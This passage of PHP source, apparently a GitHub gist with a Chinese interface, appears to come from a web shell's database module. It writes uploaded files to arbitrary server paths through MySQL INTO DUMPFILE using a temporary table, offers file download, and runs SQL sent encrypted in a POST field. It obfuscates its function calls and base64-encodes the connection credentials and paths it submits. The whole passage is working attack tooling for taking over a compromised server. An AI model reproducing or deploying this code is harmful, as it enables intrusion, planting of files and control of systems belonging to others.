$tmp = self::$fileClass->filePathFormat(THEPATH) . '/upfile.tmp';
if (self::$fileClass->moveFile($_FILES['upfile']['tmp_name'] , $tmp)) {
$file_code = bin2hex(self::$fileClass->readFile($tmp));
@unlink($tmp);
}
}
$query = 'Insert INTO ' . $rand_str_2 . ' (' . $rand_str_1 . ') VALUES(CONVERT(0x' . $file_code . ',CHAR));';
if (@$ai($query , $conn)) {
$query = 'SELECT ' . $rand_str_1 . ' FROM ' . $rand_str_2 . ' INTO DUMPFILE \'' . $uppath . '\';';
$message = @$ai($query , $conn) ? '上传文件成功' : '上传文件失败';
} else {
$message = '插入临时表失败';
}
@$ai('Drop TABLE IF EXISTS ' . $rand_str_2 . ';' , $conn);
} else $message = '创建临时表失败';
}
$result .= <<<END
<div class="file-path">上传路径 <input id="uppath" type="text" name="uppath" value="$uppath" style="width:650px"></div><div><span>选择文件</span><div class="choose-file">选择文件<input type="file" name="upfile" class="choose-file"></div></div></div><div class="actall"><input onclick="SubmitUrl()" type="submit" value="上传" style="width:80px;">
<script>function SubmitUrl(){document.getElementById('host').value = base64encode(document.getElementById('host').value);document.getElementById('port').value = base64encode(document.getElementById('port').value);document.getElementById('user').value = base64encode(document.getElementById('user').value);document.getElementById('pass').value = base64encode(document.getElementById('pass').value);document.getElementById('data').value = base64encode(document.getElementById('data').value);document.getElementById('uppath').value = base64encode(encodeURI(document.getElementById('uppath').value));document.getElementById('nform').submit();}</script>
END;
} else if ($type == 'd') {
$result .= <<<END
<div class="upload">下载文件 <input id="downfile" type="text" name="downfile" value="$down_file" style="width:650px"></div></div><div class="actall"><a href="?action=sjcx&type=d"><input onclick="SubmitUrl()" type="submit" value="下载" style="width:80px;"></a>
<script>function SubmitUrl(){document.getElementById('host').value = base64encode(document.getElementById('host').value);document.getElementById('port').value = base64encode(document.getElementById('port').value);document.getElementById('user').value = base64encode(document.getElementById('user').value);document.getElementById('pass').value = base64encode(document.getElementById('pass').value);document.getElementById('data').value = base64encode(document.getElementById('data').value);document.getElementById('downfile').value = base64encode(encodeURI(document.getElementById('downfile').value));document.getElementById('nform').submit();}</script>
END;
} else {
if (!empty($GLOBALS['_POST']['content'])) {
$msql = Decrypt::run($GLOBALS['_POST']['content']);
if ($sql_result = @$ai($msql , $conn)) {
$message = '动作执行成功<br>';
$k = 0;
while ($row = @$au($sql_result)) {
$money_return = $row[$k];
$k ++;
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment